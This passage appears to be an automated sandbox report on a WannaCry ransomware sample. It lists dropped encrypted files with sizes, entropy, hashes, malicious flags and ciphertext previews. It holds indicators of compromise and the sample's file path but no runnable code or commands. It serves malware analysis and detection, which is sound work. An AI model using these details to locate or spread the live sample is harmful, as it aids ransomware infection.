                                                                                      Preview:WANACRY!.....Y"..v?$.(..H:..%9'8]>.i..1..y.w.%H\..U...N.li... ..Ug..9...di.~.W.W.o...$.........t...5+..O.U..a.R...,J...U..H.j......z"-......._WN....\.......]oK.[....b?.k..H#..e..1..]..B.qz......V...c/...le... ........?....U.@.#3)'*...qp.6'...^........i....H.......}fe..-&..6.h.u....W...t..4De..p"..]..Y%..b..9..=.f.@.K. ...........#t)......~..@EE1...27.........qYF..1r.z..W......sck.w.F..6.....S...a.n.YF.....~RG.....f.7....D.g..((.f.-k.R%...Tj.OvE&.Q9w....|......*....YG7(....C... ....&b..1.7.RW.I..T%.]j.Y.,{.-+....+..D..!..cY.../....u..M.... NTn.....S....9...jOW.(.Fv&.....3.=.vWF........R..o.....ti.29..."...r.r.@..*.{.I;...m..E.......uM.R4.U./\...Q........U..)..1Yh.*...K..b.hH...s......."X.Y....Y....[...i%{7g..~...i.....l..t>.'.g...^.../.F.J8_85.I.|..]...8.2%.v..}+.....r.^... .(?.|....h....Ue.B...M....3.,.+........y./.^)...f.KF_...~|.T.~4JT$7o8...... u..C.......s\VC.L$.t....(. F..."C..vV.:0<...{....y=B.J["....Q...`..6f....3....!....r2;G
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):43880
                                                                                      Entropy (8bit):7.996249773781708
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:S5EPmTOjr1MaXVgQgbDenDJPZvBwKqY5Mu9oKTCzN5Ui6q7peiRZpiktoUCbaYbK:HPmTYr1MC915J9/O31V7pjoha1bS2
                                                                                      MD5:3E1A9F21443FBC5A9AA43B5B8E78764A
                                                                                      SHA1:61957CD6771AD1D416CE4FB047C44A2BDF9A52CB
                                                                                      SHA-256:1BDFA3BAC15C6BD7BD5AE0E9BCA3AE7F277099526DAC82BEC60516941DEEEEA2
                                                                                      SHA-512:99244C3BBF09C0403F942677AE728E46BC30BFC2E40B5472946795CA05B7971E3FB2D1EF372ACC209EC2913A6C55B94DAF40E4146BA82ACA6E30841A953A0338
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....Y"..v?$.(..H:..%9'8]>.i..1..y.w.%H\..U...N.li... ..Ug..9...di.~.W.W.o...$.........t...5+..O.U..a.R...,J...U..H.j......z"-......._WN....\.......]oK.[....b?.k..H#..e..1..]..B.qz......V...c/...le... ........?....U.@.#3)'*...qp.6'...^........i....H.......}fe..-&..6.h.u....W...t..4De..p"..]..Y%..b..9..=.f.@.K. ...........#t)......~..@EE1...27.........qYF..1r.z..W......sck.w.F..6.....S...a.n.YF.....~RG.....f.7....D.g..((.f.-k.R%...Tj.OvE&.Q9w....|......*....YG7(....C... ....&b..1.7.RW.I..T%.]j.Y.,{.-+....+..D..!..cY.../....u..M.... NTn.....S....9...jOW.(.Fv&.....3.=.vWF........R..o.....ti.29..."...r.r.@..*.{.I;...m..E.......uM.R4.U./\...Q........U..)..1Yh.*...K..b.hH...s......."X.Y....Y....[...i%{7g..~...i.....l..t>.'.g...^.../.F.J8_85.I.|..]...8.2%.v..}+.....r.^... .(?.|....h....Ue.B...M....3.,.+........y./.^)...f.KF_...~|.T.~4JT$7o8...... u..C.......s\VC.L$.t....(. F..."C..vV.:0<...{....y=B.J["....Q...`..6f....3....!....r2;G
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):584
                                                                                      Entropy (8bit):7.5933758307439785
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:bkEcgRplRkERuAQ6KcjmBzvbGuoyt4xf9bKcq8laONwMl:bkgVkhAKokb6HJLJlam9
                                                                                      MD5:D71CFD8F9519B8EF1C97BC7476D098F2
                                                                                      SHA1:31DFE038242DC8C43E198EF479C6CFB9FF831552
                                                                                      SHA-256:478DB738DDAD68E21D4A567C43EFED590D3C93C89D1509EAA63682CD8D2B13CC
                                                                                      SHA-512:09FD67C4C8D663FEB9B4B92D7A1BEA1F359A1AE84AAE2271091D7A1F347536A9075F32BFBC747F687FF7C027EBB8C264A00D7B98A543DFB461EA496BAA967ED2
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....i..P.p2....h.=...sv.v7.....a.+..@.i..l.'...Plv1.s._..T...(k..U.<..,..?..N.$X......%Y.'.7............L.......W)..+.>V.L).q.#...`.9...Z~.v...*....Y...!..,.ri...@.v.njj.....o..E...?R.`Y..l..g.r...p...J4....J..`...q....Wg...x...j.....l..."ZkX........#.......~s.h.@.......y.b.)._..H.?........f....[h?.#..q...n.Za.qA...*..........Vd\...j.:..,.v...F.+j..$.S..8jn...]p.....Q=.b=~k..W..@...+2.}.S.......${".(...."...m.....o[&..lk.QY....o.....lF.I.5q^.6~..2w.q.....sK.<...4.D!~%..~R..C..@.........8...#.H........fON..71:.1...;..s.b.....Jr.....U..0..uB...[l...@
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):584
                                                                                      Entropy (8bit):7.5933758307439785
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:bkEcgRplRkERuAQ6KcjmBzvbGuoyt4xf9bKcq8laONwMl:bkgVkhAKokb6HJLJlam9
                                                                                      MD5:D71CFD8F9519B8EF1C97BC7476D098F2
                                                                                      SHA1:31DFE038242DC8C43E198EF479C6CFB9FF831552
                                                                                      SHA-256:478DB738DDAD68E21D4A567C43EFED590D3C93C89D1509EAA63682CD8D2B13CC
                                                                                      SHA-512:09FD67C4C8D663FEB9B4B92D7A1BEA1F359A1AE84AAE2271091D7A1F347536A9075F32BFBC747F687FF7C027EBB8C264A00D7B98A543DFB461EA496BAA967ED2
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....i..P.p2....h.=...sv.v7.....a.+..@.i..l.'...Plv1.s._..T...(k..U.<..,..?..N.$X......%Y.'.7............L.......W)..+.>V.L).q.#...`.9...Z~.v...*....Y...!..,.ri...@.v.njj.....o..E...?R.`Y..l..g.r...p...J4....J..`...q....Wg...x...j.....l..."ZkX........#.......~s.h.@.......y.b.)._..H.?........f....[h?.#..q...n.Za.qA...*..........Vd\...j.:..,.v...F.+j..$.S..8jn...]p.....Q=.b=~k..W..@...+2.}.S.......${".(...."...m.....o[&..lk.QY....o.....lF.I.5q^.6~..2w.q.....sK.<...4.D!~%..~R..C..@.........8...#.H........fON..71:.1...;..s.b.....Jr.....U..0..uB...[l...@
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):138488
                                                                                      Entropy (8bit):7.998734102076982
                                                                                      Encrypted:true
                                                                                      SSDEEP:3072:2uSWZs7f3fvBDPI5VDTpsGkO5G00fqG8gC:216sL3fvBYnknAG8gC
                                                                                      MD5:F14B8735CBCA8030042BA39D1AD2F738
                                                                                      SHA1:377DCAFC404F29068C64599F18D4770BA46D59C4
                                                                                      SHA-256:93DA95F1C2C7C485F0A79CE3C2B5DF3433389FBA0BD7B4FF5ED9D2E443695B9C
                                                                                      SHA-512:7A7901857A87F7A965997F9DCB8A26D7E039B438E92E03A320FB34A65A436622DE22993467304E6A5165B3F474CA0A3136245D2015DAA298B9B68937449F2CA9
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....#.......rS.j....:.V..<S....M..t..E.px. .\.!.~n)).s..1K.Q.i....3.>.R..........3.<-..LR..WB......$...K..5....5r..Z....L.....N...g.S..A*.:..}.._:r.``..E..-....7....&...7...B.^..^-.X&\...K.c&.t...A..K...dp..B..j.:..|...8.M...I..ipw...oI.;...O(`g^....................=p..qI..7...<:.P....V....?...ck..;4..]./m$...X^z>..8.o..1..B..Zot..@....#YJ]_......O%.%..f..g....O..4b..`.....O........a...f.6..9.S<.7....V...O.4....OS*...n..3<.{.s..&*iF..=8.W.[-.A...R^.OM.......\..$c.#.3r.6....B..Wa@..i.J}....nD.x....J..2....E.9....'.WfU]Fn..+ N.$...........i.&5%.q.....q..4..v.c.^......U.Q..+........|...R.fp...r.pM%...zy..4pV..~.......A.Q..Z.".4.8..V...z.Q#.p..~.)....y?..0.......L..5W.x...G.d.....Y..9...'}...a......5)J.....Nl...._7w#....\Z..".r.,!mO....9q.v...<>.3.uX^....Dn....7..i.....u..by..#.a...e.=h.O{.U|1.Z.i?..}&.HW..'.....&Q`_j..s...)K. .{..KS..:......E..).......Do......./.....1|g....../.....G...u$...*.5.._j..?...}.}.....r.dC.e.M.l...q...GJ\.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):138488
                                                                                      Entropy (8bit):7.998734102076982
                                                                                      Encrypted:true
                                                                                      SSDEEP:3072:2uSWZs7f3fvBDPI5VDTpsGkO5G00fqG8gC:216sL3fvBYnknAG8gC
                                                                                      MD5:F14B8735CBCA8030042BA39D1AD2F738
                                                                                      SHA1:377DCAFC404F29068C64599F18D4770BA46D59C4
                                                                                      SHA-256:93DA95F1C2C7C485F0A79CE3C2B5DF3433389FBA0BD7B4FF5ED9D2E443695B9C
                                                                                      SHA-512:7A7901857A87F7A965997F9DCB8A26D7E039B438E92E03A320FB34A65A436622DE22993467304E6A5165B3F474CA0A3136245D2015DAA298B9B68937449F2CA9
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....#.......rS.j....:.V..<S....M..t..E.px. .\.!.~n)).s..1K.Q.i....3.>.R..........3.<-..LR..WB......$...K..5....5r..Z....L.....N...g.S..A*.:..}.._:r.``..E..-....7....&...7...B.^..^-.X&\...K.c&.t...A..K...dp..B..j.:..|...8.M...I..ipw...oI.;...O(`g^....................=p..qI..7...<:.P....V....?...ck..;4..]./m$...X^z>..8.o..1..B..Zot..@....#YJ]_......O%.%..f..g....O..4b..`.....O........a...f.6..9.S<.7....V...O.4....OS*...n..3<.{.s..&*iF..=8.W.[-.A...R^.OM.......\..$c.#.3r.6....B..Wa@..i.J}....nD.x....J..2....E.9....'.WfU]Fn..+ N.$...........i.&5%.q.....q..4..v.c.^......U.Q..+........|...R.fp...r.pM%...zy..4pV..~.......A.Q..Z.".4.8..V...z.Q#.p..~.)....y?..0.......L..5W.x...G.d.....Y..9...'}...a......5)J.....Nl...._7w#....\Z..".r.,!mO....9q.v...<>.3.uX^....Dn....7..i.....u..by..#.a...e.=h.O{.U|1.Z.i?..}&.HW..'.....&Q`_j..s...)K. .{..KS..:......E..).......Do......./.....1|g....../.....G...u$...*.5.._j..?...}.}.....r.dC.e.M.l...q...GJ\.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):5096
                                                                                      Entropy (8bit):7.958711105540836
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:ofEC82b5HsIf5UJga7PzV0wBGSKZrmwTQLP1gTokQZQj:Gb2IfJADK9mmQb1gPaI
                                                                                      MD5:7FD1893182DB0D1748F65117E37BE20B
                                                                                      SHA1:FFF2D54A6345C500974F2D9BA21A75450F3E681D
                                                                                      SHA-256:A98C13D5DC03A367567F7FFD659289B95DE0B722C30311D2C34BCBD97AB5D871
                                                                                      SHA-512:E5B080F8AB21238303304EA5444905D87B8497186BC93502207D18C3C247FA684033AC31BF16C60D6BB00072B0FFFFD10544CD86436EBCADE563197E19DE71F2
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!........!.....c........T..!....#..T...W.*.fUI.[..qj.d%.8.<(w...?.sO.e..1...'L..$90.....5.3......1.OY>...Cg.3Z.QJo.-5N...C...7..p...8....)Aw.....p}.....c.+.....m..j..4..[..dl@..Au..].!......a2..>oh.W$.`2...#k?..<.G....L'84b.....b..t.'.]..Kr..L...+(Y.R...............V..k.\..m...(.=.\......D...y......=.....xJ^..5....p3[.I..1...]...v.....V.........{.X.....:......]..&.. .G/......1....rF.....D.j.u..1.;.......XVw.......0.tI..+E.8C..^?A......k....8a...~.....r,.0..<)C.u...;.D...d._._...?...........U..Q.>F....~..c..l...@=........~.B...a".y.n+..;..|.t...d.x....`..u.j.xS..3..J.=.C....K.......Z.|T%...^....t.Nx......);\..>..I+.........D.n...2.g..)c..6....A..$.}.........d.Y.Ul.9.....J.B..A.).M.V..JvD...V,?../...B"&.h_..`........j;9.i.<e..(to....j..l.f..G.'..3.a.%.1H.....B:.|......G.RO....u........^...........*LQ.$..~..>...;.Ya..^I...caM.j.>....s.....C.b.....g:,m.I.N.....w...y8`U...H.......ei.*^..G{.k>L..7...*....UA|.p.......{h.CJ.s...&.!*...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):5096
                                                                                      Entropy (8bit):7.958711105540836
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:ofEC82b5HsIf5UJga7PzV0wBGSKZrmwTQLP1gTokQZQj:Gb2IfJADK9mmQb1gPaI
                                                                                      MD5:7FD1893182DB0D1748F65117E37BE20B
                                                                                      SHA1:FFF2D54A6345C500974F2D9BA21A75450F3E681D
                                                                                      SHA-256:A98C13D5DC03A367567F7FFD659289B95DE0B722C30311D2C34BCBD97AB5D871
                                                                                      SHA-512:E5B080F8AB21238303304EA5444905D87B8497186BC93502207D18C3C247FA684033AC31BF16C60D6BB00072B0FFFFD10544CD86436EBCADE563197E19DE71F2
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!........!.....c........T..!....#..T...W.*.fUI.[..qj.d%.8.<(w...?.sO.e..1...'L..$90.....5.3......1.OY>...Cg.3Z.QJo.-5N...C...7..p...8....)Aw.....p}.....c.+.....m..j..4..[..dl@..Au..].!......a2..>oh.W$.`2...#k?..<.G....L'84b.....b..t.'.]..Kr..L...+(Y.R...............V..k.\..m...(.=.\......D...y......=.....xJ^..5....p3[.I..1...]...v.....V.........{.X.....:......]..&.. .G/......1....rF.....D.j.u..1.;.......XVw.......0.tI..+E.8C..^?A......k....8a...~.....r,.0..<)C.u...;.D...d._._...?...........U..Q.>F....~..c..l...@=........~.B...a".y.n+..;..|.t...d.x....`..u.j.xS..3..J.=.C....K.......Z.|T%...^....t.Nx......);\..>..I+.........D.n...2.g..)c..6....A..$.}.........d.Y.Ul.9.....J.B..A.).M.V..JvD...V,?../...B"&.h_..`........j;9.i.<e..(to....j..l.f..G.'..3.a.%.1H.....B:.|......G.RO....u........^...........*LQ.$..~..>...;.Ya..^I...caM.j.>....s.....C.b.....g:,m.I.N.....w...y8`U...H.......ei.*^..G{.k>L..7...*....UA|.p.......{h.CJ.s...&.!*...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):702504
                                                                                      Entropy (8bit):7.999733827472969
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:TF7umOvh31hMxP2AtY0DGWI16fob7JUXi+TUUJIbNfFuP9ko/13xIzxYSIZU:QmUN1O2AtYlWIstXi+TUUSfFulko/13q
                                                                                      MD5:99249EBC7834AF4282D950AC3A16A1EC
                                                                                      SHA1:D084FF711B0DD0B6949470B1DA52ED21805A4BF6
                                                                                      SHA-256:0D4017257D20B260697E1C0FA24B81854B6DA4DF270E83F89B697AC38E7679FB
                                                                                      SHA-512:F993276FEF9C1C780F8FC5EC54CE9C621955FBC22ED0D08F989C137AE607D770DF451A58509E726233B2064104F0303E5F15418B8EC9B2D2E01C6BF892C2CEE0
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....r.. .G?.*^.jZ.\7O...t"o.|..`;.....01../b...m6..VKe...W.A7..3.(\."..-6.....7x..X...dtI.y;1.........Y....ag.`..>.u..I!l%#..^M.wD...eK..B...H.....\.h.".X.....Vqn\)#{.D@g....+....9.F !3..m..}'.gJ....TP...2F7)8....c.{ ....D..D.....sS..]Y.B.....O4Fr0us.............=g.._*0.m$.l.KIik.:............W.....C.;.2....2....5.....|.x.OU4,....IKd....E.w.-..f^....~KV!v.gi.9w.....m.0p.._Y.p.....D.V.....t...1io..?.]...uD.....mjH...[.>....H(.M;.Q..S...n.r.0m"c.`..~.....:z....}K......b.X.....X.+u....q^.g........NV.F...x....9n1..'..t3.....{+.c.........N g..9.P.o."2.(!.'.z.;........(.D.Q...]........k.b/..4....j8kl....HG.P.*....A...ao.|.Hx.7~..*....T...0|.....Q.{....r..8.1...1P.]vNU....r..z8..Q.......)?.y........b.....v.th.m....n...W2..2..4..T..7.6w..{......K...RC.j.-3..E...^Y6..p..aU'....N.O.*.......-c>]ZS..!..s...>...........5d.5s.2b...UP..,.P-..x{.....vw.4D.....{l.K.tu.hUe..&..b...?..s.Vk......'.R=.TY0)5..UI......;$.j=.~.z.^%....T1.n.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):702504
                                                                                      Entropy (8bit):7.999733827472969
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:TF7umOvh31hMxP2AtY0DGWI16fob7JUXi+TUUJIbNfFuP9ko/13xIzxYSIZU:QmUN1O2AtYlWIstXi+TUUSfFulko/13q
                                                                                      MD5:99249EBC7834AF4282D950AC3A16A1EC
                                                                                      SHA1:D084FF711B0DD0B6949470B1DA52ED21805A4BF6
                                                                                      SHA-256:0D4017257D20B260697E1C0FA24B81854B6DA4DF270E83F89B697AC38E7679FB
                                                                                      SHA-512:F993276FEF9C1C780F8FC5EC54CE9C621955FBC22ED0D08F989C137AE607D770DF451A58509E726233B2064104F0303E5F15418B8EC9B2D2E01C6BF892C2CEE0
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....r.. .G?.*^.jZ.\7O...t"o.|..`;.....01../b...m6..VKe...W.A7..3.(\."..-6.....7x..X...dtI.y;1.........Y....ag.`..>.u..I!l%#..^M.wD...eK..B...H.....\.h.".X.....Vqn\)#{.D@g....+....9.F !3..m..}'.gJ....TP...2F7)8....c.{ ....D..D.....sS..]Y.B.....O4Fr0us.............=g.._*0.m$.l.KIik.:............W.....C.;.2....2....5.....|.x.OU4,....IKd....E.w.-..f^....~KV!v.gi.9w.....m.0p.._Y.p.....D.V.....t...1io..?.]...uD.....mjH...[.>....H(.M;.Q..S...n.r.0m"c.`..~.....:z....}K......b.X.....X.+u....q^.g........NV.F...x....9n1..'..t3.....{+.c.........N g..9.P.o."2.(!.'.z.;........(.D.Q...]........k.b/..4....j8kl....HG.P.*....A...ao.|.Hx.7~..*....T...0|.....Q.{....r..8.1...1P.]vNU....r..z8..Q.......)?.y........b.....v.th.m....n...W2..2..4..T..7.6w..{......K...RC.j.-3..E...^Y6..p..aU'....N.O.*.......-c>]ZS..!..s...>...........5d.5s.2b...UP..,.P-..x{.....vw.4D.....{l.K.tu.hUe..&..b...?..s.Vk......'.R=.TY0)5..UI......;$.j=.~.z.^%....T1.n.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):97816
                                                                                      Entropy (8bit):7.9979231931385995
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:pITV4r5ErVgV6V0LpuvX2al6acgEfpIedfOklhQZzqWi4Chf/F/oFWN3x7Bfd1lY:WV4rzI00d6acNFlOR9JY/F/oFWNB7plY
                                                                                      MD5:3B13486846682173E79C3BFC59F5DDDD
                                                                                      SHA1:7C5EFD1F612780AC8A3106B2207D671447A0D886
                                                                                      SHA-256:EE46C13030C6A34CA9A666D0A30CCEAD7914C6D03FD78C2EF113317EC3B3F054
                                                                                      SHA-512:927AC09B1BEE3656161204454554069F0DBBB8F52E2EACE63F2E3D0C3A431D766357F2241290600DEF89964991A0F017DBAEB7EDD34B63EE6C74EB06E75CDD79
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....oxmr.1;6..`.y'.6.....Zs......G..8.U......9...6M)...........qF.>. 4.P.....j1c.l........T.h........i0Q.....I..cj.K..z.ar......s........t.mHj.&.]..q..Cc.G.i~.6..Ei..../...-....Q(..Vh.k..u.F{.=.....".........)..K.....z...7.g.z..][....X$..Fv..)..n.....|....../uF,.....Ag..P%.HG....../...r..|...9....F.....[X.p=.Ip..8.7J..E...T......Y.....e_.T..n...ra..Ht|.ZAh3..7.QI..zpT....4.q.!.oP...&.......j./.Cs./9._.......m..a.QM.....s.B.b...4....&O.Uwi.4...JrsV..Vm........F..81a..P.r.A?+T5.G.....-..`....(.I.B........d"...6.!.........~vNg.....M.v.J....."...4._...uek/.B)..@1.S...g.X..Ud...!#J..h.M....*%..l:$...=..@?._.>..jFx~..'e.L%.$...>N.1.]..D..ZJl.c.....5..F......z....W..rS.A....&..r..+G..............b......t.4;..u.....]..NEL.....c...%Pd+...o....CZ.o.$.......].g...1.B..Y....'t.&...Q1..w.....,......C[..~...8..4.Csa......Q....r.r.....=.../4..PA....P.@~..E......qN...|M?.\...X.W2To..."..$..4...x.<...~..I.X@O-.....z.....nS.p.E@^..vo...V?...{,...q.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):97816
                                                                                      Entropy (8bit):7.9979231931385995
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:pITV4r5ErVgV6V0LpuvX2al6acgEfpIedfOklhQZzqWi4Chf/F/oFWN3x7Bfd1lY:WV4rzI00d6acNFlOR9JY/F/oFWNB7plY
                                                                                      MD5:3B13486846682173E79C3BFC59F5DDDD
                                                                                      SHA1:7C5EFD1F612780AC8A3106B2207D671447A0D886
                                                                                      SHA-256:EE46C13030C6A34CA9A666D0A30CCEAD7914C6D03FD78C2EF113317EC3B3F054
                                                                                      SHA-512:927AC09B1BEE3656161204454554069F0DBBB8F52E2EACE63F2E3D0C3A431D766357F2241290600DEF89964991A0F017DBAEB7EDD34B63EE6C74EB06E75CDD79
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....oxmr.1;6..`.y'.6.....Zs......G..8.U......9...6M)...........qF.>. 4.P.....j1c.l........T.h........i0Q.....I..cj.K..z.ar......s........t.mHj.&.]..q..Cc.G.i~.6..Ei..../...-....Q(..Vh.k..u.F{.=.....".........)..K.....z...7.g.z..][....X$..Fv..)..n.....|....../uF,.....Ag..P%.HG....../...r..|...9....F.....[X.p=.Ip..8.7J..E...T......Y.....e_.T..n...ra..Ht|.ZAh3..7.QI..zpT....4.q.!.oP...&.......j./.Cs./9._.......m..a.QM.....s.B.b...4....&O.Uwi.4...JrsV..Vm........F..81a..P.r.A?+T5.G.....-..`....(.I.B........d"...6.!.........~vNg.....M.v.J....."...4._...uek/.B)..@1.S...g.X..Ud...!#J..h.M....*%..l:$...=..@?._.>..jFx~..'e.L%.$...>N.1.]..D..ZJl.c.....5..F......z....W..rS.A....&..r..+G..............b......t.4;..u.....]..NEL.....c...%Pd+...o....CZ.o.$.......].g...1.B..Y....'t.&...Q1..w.....,......C[..~...8..4.Csa......Q....r.r.....=.../4..PA....P.@~..E......qN...|M?.\...X.W2To..."..$..4...x.<...~..I.X@O-.....z.....nS.p.E@^..vo...V?...{,...q.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1212760
                                                                                      Entropy (8bit):7.999864037958963
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:t6ZPtyFsKXolKuwXNHVJTfw0/YQCRK/ruQEqS5Nn6QJN+2:2yFsLcuAFVJTfwGY4KQE/H
                                                                                      MD5:A6A7B046B09596D1EE7611565A5148F4
                                                                                      SHA1:6632830C538696274D98F3BE4493C15965BE42E1
                                                                                      SHA-256:2D5ACAD7165376D43BC846D0E0E60CE619AAB23C63FAE5B0FD4062A7CA343504
                                                                                      SHA-512:97400BADAB0BD9A5F42DBF0E3D4395F2069D77DDAD89FF577A8DDA2D079906AF5E973132D7EB0F7A9E5E13F18DFFE9A2A84D0877CFF196B52FEB488D5A4D3C8C
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......N9P[.e...f....Nt.4.mUc...60..5......u....'sT..S)e!V..5.7.i......`..?..U..JJ6_.u6Q.:..[....W.V.....z.9..Q...m=.Y.....6......&.g..>...`(.}.y....|..h..f....G]..+.....".-..-./..4...].<.....4...#.nZM....C..zr...B .D.Ci....c.....0..{!lrd{../..U.r....;...........n*1g.5.....Um.l..Z.s.z...@....M...BH.ij."{.c...$.bl......^.....;.....$...r.C.|..Q.)z....J...2..Y..n.y.7.....ZS.hXf.Y. 0.2.D.l..?.j5.4...@.._..._....Q.9.D7........y..D'l.E$[..E.s..6LV...@. ...._..a.....q..$..o.U.U|.W..Z.v....../|. j..T&.H......j...t....M.FJ/._..q:.........D.\..1}.....E....0..|..3.....q'..Y.).X.']..T....f|..Q.....H.yj/.:..(.R....-.2.....j........h...Xu....gvT.IpS<...!.5..I..G..t..q..`..k.....u...GP..#>.FJM.@.....C.h.2..N.R.._7Qio..=u...hE../...).B..^..X.k.Z.KSS.r.....S/...O.*IWC.Y.......uTU..z.).&..>n~|.f.R.O.<..I...jbk..s<........!K.._......*I.;.......Nu.9k..8a........4.k......s.......2K..U.S..x.=.."S....m...2..:.'..)N.I...n#..[....^..I*.9........%,......
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1212760
                                                                                      Entropy (8bit):7.999864037958963
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:t6ZPtyFsKXolKuwXNHVJTfw0/YQCRK/ruQEqS5Nn6QJN+2:2yFsLcuAFVJTfwGY4KQE/H
                                                                                      MD5:A6A7B046B09596D1EE7611565A5148F4
                                                                                      SHA1:6632830C538696274D98F3BE4493C15965BE42E1
                                                                                      SHA-256:2D5ACAD7165376D43BC846D0E0E60CE619AAB23C63FAE5B0FD4062A7CA343504
                                                                                      SHA-512:97400BADAB0BD9A5F42DBF0E3D4395F2069D77DDAD89FF577A8DDA2D079906AF5E973132D7EB0F7A9E5E13F18DFFE9A2A84D0877CFF196B52FEB488D5A4D3C8C
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......N9P[.e...f....Nt.4.mUc...60..5......u....'sT..S)e!V..5.7.i......`..?..U..JJ6_.u6Q.:..[....W.V.....z.9..Q...m=.Y.....6......&.g..>...`(.}.y....|..h..f....G]..+.....".-..-./..4...].<.....4...#.nZM....C..zr...B .D.Ci....c.....0..{!lrd{../..U.r....;...........n*1g.5.....Um.l..Z.s.z...@....M...BH.ij."{.c...$.bl......^.....;.....$...r.C.|..Q.)z....J...2..Y..n.y.7.....ZS.hXf.Y. 0.2.D.l..?.j5.4...@.._..._....Q.9.D7........y..D'l.E$[..E.s..6LV...@. ...._..a.....q..$..o.U.U|.W..Z.v....../|. j..T&.H......j...t....M.FJ/._..q:.........D.\..1}.....E....0..|..3.....q'..Y.).X.']..T....f|..Q.....H.yj/.:..(.R....-.2.....j........h...Xu....gvT.IpS<...!.5..I..G..t..q..`..k.....u...GP..#>.FJM.@.....C.h.2..N.R.._7Qio..=u...hE../...).B..^..X.k.Z.KSS.r.....S/...O.*IWC.Y.......uTU..z.).&..>n~|.f.R.O.<..I...jbk..s<........!K.._......*I.;.......Nu.9k..8a........4.k......s.......2K..U.S..x.=.."S....m...2..:.'..)N.I...n#..[....^..I*.9........%,......
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):46296
                                                                                      Entropy (8bit):7.995750752352893
                                                                                      Encrypted:true
